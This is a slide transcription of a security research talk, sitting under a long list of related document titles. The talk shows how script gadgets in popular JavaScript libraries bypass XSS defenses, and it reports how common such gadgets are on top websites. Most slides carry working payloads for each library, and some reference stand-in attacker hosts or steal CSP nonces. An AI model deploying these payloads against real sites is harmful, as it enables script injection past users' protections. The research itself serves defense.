We will show you how we bypassed every XSS mitigation we tested. Mitigation bypass-ability via script gadget chains in 16 popular libraries

Similar documents
Code-Reuse Attacks for the Web: Breaking XSS mitigations via Script Gadgets

Trusted Types - W3C TPAC

BOOSTING THE SECURITY

BOOSTING THE SECURITY OF YOUR ANGULAR 2 APPLICATION

So we broke all CSPs. You won't guess what happened next!

CSP ODDITIES. Michele Spagnuolo Lukas Weichselbaum

Web Security: Vulnerabilities & Attacks

25 Million Flows Later Large-scale Detection of DOM-based XSS. CCS 2013, Berlin Sebastian Lekies, Ben Stock, Martin Johns

Web Security IV: Cross-Site Attacks

Defense-in-depth techniques. for modern web applications

Is Browsing Safe? Web Browser Security. Subverting the Browser. Browser Security Model. XSS / Script Injection. 1. XSS / Script Injection

Content Security Policy

RKN 2015 Application Layer Short Summary

Riding out DOMsday: Toward Detecting and Preventing DOM Cross-Site Scripting. William Melicher Anupam Das Mahmood Sharif Lujo Bauer Limin Jia

Browser code isolation

Code-Injection Attacks in Browsers Supporting Policies. Elias Athanasopoulos, Vasilis Pappas, and Evangelos P. Markatos FORTH-ICS

Finding Vulnerabilities in Web Applications

Web basics: HTTP cookies

How is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach

Client Side Security And Testing Tools

Templates and Databinding. SWE 432, Fall 2017 Design and Implementation of Software for the Web

HTTP Security Headers Explained

WEB SECURITY: XSS & CSRF

The security of Mozilla Firefox s Extensions. Kristjan Krips

Don't Trust The Locals: Exploiting Persistent Client-Side Cross-Site Scripting in the Wild

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang

CIS 4360 Secure Computer Systems XSS

The Evolution of Chrome Security Architecture. Huan Ren Director, Qihoo 360 Technology Ltd

Web basics: HTTP cookies

CS 161 Computer Security

Extending the browser to secure applications

AN EVALUATION OF THE GOOGLE CHROME EXTENSION SECURITY ARCHITECTURE

High -Tech Bridge s Web Server Security Service API Developer Documentation Version v1.3 February 13 th 2018

Portcullis Computer Security.

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis

Writing Secure Chrome Apps and Extensions

INJECTING SECURITY INTO WEB APPS WITH RUNTIME PATCHING AND CONTEXT LEARNING

Web Security: Vulnerabilities & Attacks

Content Security Policy


last time: command injection

Match the attack to its description:

Security and Privacy. SWE 432, Fall 2016 Design and Implementation of Software for the Web

Computer Security 3e. Dieter Gollmann. Chapter 18: 1

Synode: Understanding and Automatically Preventing Injection Attacks on Node.js

Web security: an introduction to attack techniques and defense methods

High Performance Single Page Application with Vue.js

Client Side Injection on Web Applications

Some Facts Web 2.0/Ajax Security

Computer Security CS 426 Lecture 41

Large-Scale Analysis of Style Injection by Relative Path Overwrite

Comprehensive AngularJS Programming (5 Days)

Origin Policy Enforcement in Modern Browsers

Chrome Extension Security Architecture

Simple AngularJS thanks to Best Practices

Cross-Site Scripting (XSS) Professor Larry Heimann Web Application Security Information Systems

Protecting users against XSS-based password manager abuse. AsiaCCS 2014, Kyoto Ben Stock, Martin Johns

Static analysis of PHP applications

CSC 482/582: Computer Security. Cross-Site Security

CS 161 Computer Security

Eliminating XSS: Context-Sensitive Auto-Sanitization in PHP

Introduction to AngularJS

CNIT 129S: Securing Web Applications. Ch 12: Attacking Users: Cross-Site Scripting (XSS) Part 2

2/16/18. CYSE 411/AIT 681 Secure Software Engineering. Secure Coding. The Web. Topic #11. Web Security. Instructor: Dr. Kun Sun

NoScript, CSP and ABE: When The Browser Is Not Your Enemy

FIRE-FOX XSS PREVENTION

Hacking Web Sites Cross Site Scripting

TechWatch Report Javascript Libraries and Frameworks

Design and Implementation of Single Page Application Based on AngularJS

7.2.4 on Media content; on XSS) sws2 1

DEFENSIVE PROGRAMMING. Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology

MODERN WEB APPLICATION DEFENSES

EasyCrypt passes an independent security audit

CNIT 129S: Securing Web Applications. Ch 10: Attacking Back-End Components

tostatichtml() for Everyone!

Information Security CS 526 Topic 8

The Most Dangerous Code in the Browser. Stefan Heule, Devon Rifkin, Alejandro Russo, Deian Stefan

Lecture 17 Browser Security. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422

Analysis of Hypertext Isolation Techniques for Cross-site Scripting Prevention. Mike Ter Louw Prithvi Bisht V.N. Venkatakrishnan

Attacks on Clients: JavaScript & XSS

W e b A p p l i c a t i o n S e c u r i t y : T h e D e v i l i s i n t h e D e t a i l s

Sandboxing JavaScript. Lieven Desmet iminds-distrinet, KU Leuven OWASP BeNeLux Days 2012 (29/11/2012, Leuven) DistriNet

The Hacker s Guide to XSS

CSC 405 Computer Security. Web Security

Your Scripts in My Page: What Could Possibly Go Wrong? Sebastian Lekies / Ben Stock Martin Johns

Manual Html A Href Onclick Submit Form

Common Websites Security Issues. Ziv Perry

extc Web Developer Rapid Web Application Development and Ajax Framework Using Ajax

Model-View-Whatever A COMPARISON OF JAVASCRIPT MVC/MVP/MVVM FRAMEWORKS. J. Tower

Code Injection Attacks

Web Application Security

Web 2.0 and AJAX Security. OWASP Montgomery. August 21 st, 2007

Preventing Security Bugs Through Software Design. Christoph Kern, Google

shortcut Tap into learning NOW! Visit for a complete list of Short Cuts. Your Short Cut to Knowledge

C1: Define Security Requirements

This slide shows the OWASP Top 10 Web Application Security Risks of 2017, which is a list of the currently most dangerous web vulnerabilities in

CHAPTER 8 CONCLUSION AND FUTURE ENHANCEMENTS

Abusing JSONP with. Michele - CVE , CVE Pwnie Awards 2014 Nominated

Security. CSC309 TA: Sukwon Oh

Single Page Applications using AngularJS

Transcription:

We will show you how we bypassed every XSS mitigation we tested. Mitigation bypass-ability via script gadget chains in 16 popular libraries PoCs included Content Security Policy WAFs whitelists nonces unsafe-eval strict-dynamic ModSecurity CRS 3 /16 4 /16 10 /16 13 /16 9 /16 XSS Filters Sanitizers Chrome Edge NoScript DOMPurify Closure 13 /16 9 /16 9 /16 9 /16 6 /16

XSS and mitigations

What was XSS, again? XSS happens when web applications have code like this: Hello <?php echo $_GET["user"]?>. Attacker exploits it by injecting: <script>alert(1)</script>

How to fix XSS? The right way to fix an XSS is by using a contextually aware templating system which is safe by default, and automatically escapes user data in the right way. Securing the Tangled Web, Christoph Kern 2014 Reducing XSS by way of Automatic Context-Aware Escaping in Template Systems, Jad Boutros 2009 Sometimes, it requires a considerable effort to migrate to that solution.

XSS? How is this still a problem?

Mitigating vs fixing "Fixing XSS is hard. Let s instead focus on mitigating the attack." The mitigator alligator circa 2016 Mitigations do not fix the vulnerability. they try to make the attacks harder instead. The XSS is still there, it s just presumably harder to exploit it.

WAFs, XSS filters Block requests containing dangerous tags / attributes HTML Sanitizers Remove dangerous tags / attributes from HTML Content Security Policy Distinguish legitimate and injected JS code Whitelist legitimate origins Whitelist code hash Require a secret nonce How do these "mitigations" work? <p width=5> <b><i> <script> onload= x

How are these mitigations different? Browser www.website.com/xss.php?inj=<xss></xss> NoScript Filter IE/Chrome Filter Warning! <XSS></XSS> BLOCK GET /xss.php?inj=<xss></xss> WAF/ModSecurity Warning! <XSS></XSS> BLOCK <XSS></XSS> CSP Warning! <XSS></XSS> BLOCK Is <XSS></XSS> allowed? No BLOCK

Many ways! But today we want to talk about... How do you bypass them?

Script Gadgets

What are Script Gadgets? Script Gadget is an *existing* JS code on the page that may be used to bypass mitigations: <div data-role="button" data-text="i am a button"></div> <script> var buttons = $("[data-role=button]"); buttons.html(button.getattribute("data-text")); </script> Script Gadget <div data-role="button" >I am a button</div>

What are Script Gadgets? Script Gadget is an *existing* JS code on the page that may be used to bypass mitigations: <div data-role="button" data-text="<script>alert(1)</script>"></div> <script> var buttons = $("[data-role=button]"); buttons.html(button.getattribute("data-text")); </script> Script Gadget <div data-role="button" ><script>alert(1)</script></div>

What are Script Gadgets? Script Gadgets convert otherwise safe HTML tags and attributes into arbitrary JavaScript code execution. data-text="<script>" <script> If a page with this gadget has an unfixed HTML injection, the attacker can inject data-text= <script> instead of injecting <script> This lets the attacker bypass XSS mitigations that look for script. Different gadgets bypass different mitigations

So what? Why should I care? Gadgets are prevalent in all but one of the tested popular web frameworks. Gadgets are confirmed to exist in at least 20% of web applications from Alexa top 5,000. Gadgets can be used to bypass most mitigations in modern web applications.

Script Gadgets in JS libraries

This HTML snippet: <div data-bind="value:'hello world'"></div> triggers the following code in Knockout: Script gadget in Knockout switch (node.nodetype) { case 1: return node.getattribute( data-bind ); var rewrittenbindings = ko.expressionrewriting.preprocessbindings(bindingsstring, options), functionbody = "with($context){with($data {}){return{" + rewrittenbindings + "}}}"; return new Function("$context", "$element", functionbody); return bindingfunction(bindingcontext, node);

Script gadget in Knockout These blocks create a gadget in Knockout that eval()s an attribute value. data-bind="value: foo" eval( foo ) To XSS a Knockout-based JS application, attacker needs to inject: <div data-bind="value: alert(1)"></div>

Example: Ajaxify Ajaxify gadget converts all <div>s with class=document-script into script elements. So if you have an XSS on a website that uses Ajaxify, you just have to inject: <div class="document-script">alert(1)</div> And Ajaxify will do the job for you.

Example: Bootstrap Bootstrap has the "simplest" gadget, passing HTML attribute value into innerhtml. <div data-toggle=tooltip data-html=true title='<script>alert(1)</script>'> HTML sanitizers allow title attribute, because it s usually safe. But they aren t, when used together with Bootstrap and other dataattributes.

Example: Google Closure Closure detects the its own script URL and then loads subresources from the same location. By injecting other HTML tags, it is possible to confuse Closure into loading them from somewhere else: <a id=closure_base_path href=data:/,1/alert(1)//></a> <form id=closure_uncompiled_defines> <input id=goog.enable_chrome_app_safe_script_loading></form>

Example: RequireJS Require JS allows the user to specify the "main" module of a JavaScript file, and it is done through a custom data attribute, of which XSS filters and other mitigations aren't aware of. <script data-main='data:1,alert(1)' src='require.js'></script>

Example: Ember This is an inert SCRIPT tag: <script src=//i.am.an.invalid.self.closing.script.tag csp=ignores-me /> Ember* dev version only creates a valid copy and re-inserts it. Since strict-dynamic CSP allows dynamically inserted SCRIPTS, this payload bypasses it: <script type=text/x-handlebars> <script src=//attacker.example.com// /> </script>

Example: jquery jquery contains gadget that takes existing <script> tags, and reinserts them. We can inject a form and an input element to confuse the jquery logic to reinsert our script: <form class="child"> <input name="ownerdocument"/><script>alert(1);</script></form> Strict-dynamic CSP blocks the <script>, but then jquery reinserts it. Now it s trusted and will execute.

Example: jquery Mobile jquery Mobile also has an HTML injection point, where the value of the "ID" attribute is dynamically put inside an HTML comment. One can achieve arbitrary code execution by simply closing the comment, and leave jquery manually execute the script. <div data-role=popup id='--><script>"use strict" alert(1)</script>'></div>

Bypassing CSP strict-dynamic via Bootstrap But wait, there s more... <div data-toggle=tooltip data-html=true title='<script>alert(1)</script>'></div> Bypassing sanitizers via jquery Mobile <div data-role=popup id='--><script>alert(1)</script>'></div> Bypassing NoScript via Closure (DOM clobbering) <a id=closure_base_path href=http://attacker/xss></a>

Bypassing ModSecurity CRS via Dojo Toolkit But wait, there s more... <div data-dojo-type="dijit/declaration" data-dojo-props="}-alert(1)-{"> Bypassing CSP unsafe-eval via underscore templates <div type=underscore/template> <% alert(1) %> </div>

Aurelia, Angular, Polymer, Ractive, Vue The frameworks above use non-eval based expression parsers They tokenize, parse & evaluate the expressions on their own Expressions are compiled to Javascript During evaluation (e.g. binding resolution) this parsed code operates on DOM elements, attributes Native objects, Arrays etc. With sufficiently complex expression language, we can run arbitrary JS code. Example: AngularJS sandbox bypasses Gadgets in expression parsers

Example: Aurelia Aurelia has its own expression language, unknown to mitigations. With it, we can create arbitrary programs and call native functions. The following payload will insert a new SCRIPT element with our code: <div ref="me" s.bind="$this.me.ownerdocument.createelement('script')" data-bar="${$this.me.s.src='data:,alert(1)'}" data-foobar="${$this.me.ownerdocument.body.appendchild($this.me.s)}"></div>

Gadgets in expression parsers And the same program in Polymer 1.x. We overwrote private _properties to confuse the framework: <template is=dom-bind><div five={{insert(me._nodes.0.scriptprop)}} four="{{set('insert',me.root.ownerdocument.body.appendchild)}}" three="{{set('me',nextsibling.previoussibling)}}" two={{set('_nodes.0.scriptprop.src','data:\,alert(1)')}} scriptprop={{_factory()}} one={{set('_factoryargs.0','script')}} > </template> Hint: Read it bottom-to-top

Gadgets in expression parsers Example: Bypassing whitelist / nonced CSP via Polymer 1.x <template is=dom-bind><div c={{alert('1',ownerdocument.defaultview)}} b={{set('_rootdatahost',ownerdocument.defaultview)}}> </div></template> Example: Bypassing whitelist / nonced CSP via AngularJS 1.6+ <div ng-app ng-csp ng-focus="x=$event.view.window;x.alert(1)">

Gadgets in expression parsers Sometimes, we can even construct CSP nonce exfiltration & reuse: Example: Stealing CSP nonces via Ractive <script id="template" type="text/ractive"> <iframe srcdoc=" <script nonce={{@global.document.currentscript.nonce}}> alert(1337) </{{}}script>"> </iframe> </script>

Gadgets in libraries - summary We looked for Script Gadgets in 16 popular modern JS libraries. AngularJS 1.x, Aurelia, Bootstrap, Closure, Dojo Toolkit, Emberjs, Knockout, Polymer 1.x, Ractive, React, RequireJS, Underscore / Backbone, Vue.js, jquery, jquery Mobile, jquery UI It turned out they are prevalent in the above Only one library did not have a a useful gadget Gadgets we found were quite effective in bypassing XSS mitigations.

Framework / Library CSP XSS Filter Sanitizers WAFs whitelists nonces unsafe-eval strict-dynamic Chrome Edge NoScript DOMPurify Closure Vue.js Aurelia AngularJS 1.x Polymer 1.x Underscore / Backbone Knockout jquery Mobile Emberjs React Closure Ractive Dojo Toolkit RequireJS jquery jquery UI Bootstrap ModSecurity CRS

Framework / Library CSP XSS Filter Sanitizers WAFs whitelists nonces unsafe-eval strict-dynamic Chrome Edge NoScript DOMPurify Closure Vue.js Aurelia AngularJS 1.x Polymer 1.x Underscore / Backbone Knockout jquery Mobile Emberjs React Closure Ractive ModSecurity CRS Dojo Toolkit RequireJS Found bypass jquery Bypass unlikely to exist jquery UI Requires userland code Development mode only Bootstrap (won't work on real websites) Requires unsafe-eval

Caveats Comparing mitigations We evaluate only one aspect: bypass-ability via Script Gadgets We ignore deployment costs, performance, updatability, vulnerability to regular XSSes etc. Comparing frameworks Similarly, we evaluate the presence of exploitable gadget chains and nothing else Default settings Sometimes altering a setting disables some gadgets Example: DOMPurify SAFE_FOR_TEMPLATES Userland code was necessary in some instances Such code reasonably exists in real-world applications - e.g. jquery after()

Results PoCs at https://github.com/google/security-research-pocs Bypasses in 53.13% of the framework/mitigation pairs React - no gadgets EmberJS - gadgets only in development version XSSes in Aurelia, AngularJS (1.x), Polymer (1.x) can bypass all mitigations via expression parsers

XSS filters, WAFs Features that encode the payloads Features that confuse the HTML parser Externalize the payload (window.name?) Client-side sanitizers Find chain with whitelisted elements / attributes (e.g. data- attributes) CSP unsafe-eval/strict-dynamic Find DOM => eval/createelement( script ) gadgets Whitelist/nonce/hash-based CSP Use framework with custom expression parser How to find your own gadgets?

Script Gadgets in user land code Work done in collaboration with Samuel Groß and Martin Johns

Methodology We used taint tracking to detect data flows from the DOM into sinks Each data flow represents a potential gadget For each flow we generate an exploit elem.innerhtml = $('#mydiv').attr('data-text'); <div id="mydiv" data-text="<script>xssgadget()</script>"> We crawled the Alexa Top 5,000 Websites One level deep All links on the same second-level domain

Crawling: We crawled 4,557 second-level domains with 37,232 subdomains 647,085 individual Web pages Tainted Data Flows Results - General 82 % of sites had at least one relevant data flow 6.72 sink calls per URL, 450 sink calls per second-level domain 4,352,491 sink calls in total with 22,379 unique gadget candidates (unique domain, sink, source combinations).

Results - Mitigations CSP unsafe-eval 48 % of all domains have a potential eval gadget CSP strict-dynamic 73 % of all domains have a potential strict-dynamic gadget. Flows into script.text/src, jquery's.html(), or createelement(tainted).text HTML sanitizers 78 % of all domains had at least one data flow from an HTML attribute 60 % of the sites exhibited data flows from data- attributes. 16 % data flows from id attributes 10 % from class attributes.

Results - Mitigations Gadgets 1,762,823 gadget-based exploit candidates generated We successfully validated 285,894 gadgets on 906 (19,88 %) domains This number represents a lower bound We believe the real number is way higher

Summary & Conclusions

XSS mitigations work by blocking attacks Focus is on potentially malicious tags / attributes Most tags and attributes are considered benign Gadgets can be used to bypass mitigations Gadgets turn benign attributes or tags into JS code Gadgets can be triggered via HTML injection Gadgets are prevalent in all modern JS frameworks They break various XSS mitigations Already known vectors at https://github.com/google/security-research-pocs Find your own too! Gadgets are confirmed to exist on userland code of many websites Summary

Adding gadget awareness to mitigations likely difficult: Multiple libraries and expression languages False positives (example) Outlook & Conclusion Patching gadgets in frameworks problematic: Multiple libraries Some gadgets are harder to find than XSS flaws Developer pushback - there s no bug (XSS is a bug) Sometimes gadgets are a feature (e.g. expression languages) Feasible only in controlled environment

Outlook & Conclusion A novice programmer, today, cannot write a complex but secure application The task is getting harder, not easier We need to make the platform secure-by-default Safe DOM APIs Better primitives in the browser Build-time security: e.g. precompiled templates (see Angular 2 AOT) We need to develop better isolation primitives Suborigins, <iframe sandbox>, Isolated scripts

Thank You!

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback